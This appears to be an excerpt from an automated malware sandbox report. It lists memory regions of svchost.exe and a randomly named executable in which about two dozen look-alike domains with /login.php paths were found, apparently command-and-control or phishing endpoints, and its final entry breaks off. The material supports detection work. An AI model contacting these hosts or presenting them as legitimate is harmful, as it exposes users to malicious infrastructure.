Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyryler.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyryman.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrymuj.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323585198.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrynad.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrytyx.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296876973.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296327594.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297408732.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrywax.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrywur.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyryxen.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyfin.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyger.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyjex.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysylej.com/login.php
Source: svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670306640.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysylun.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysymux.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334859023.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysynaj.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysynur.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysytoj.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404361246.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2504670847.000000000331A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyvud.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2646107568.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2813315381.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2750428178.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2788231276.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801006471.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3282598602.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607985509.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysywon.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysywyd.com/login.php
Source: svchost.exe, 00000002.00000003.2347368990.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347595407.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyxar.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvygon.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyguj.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyjoj.com/login.php
Source: svchost.exe, 00000002.00000003.2534942140.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799665980.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580138663.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2639783827.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513891995.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577725092.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744282585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3281377881.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2501199142.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2781606589.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2681961070.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2812761855.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746922918.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2508227965.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281429661.000000000861B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2606611423.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2645351612.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2280606997.0000000000882000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 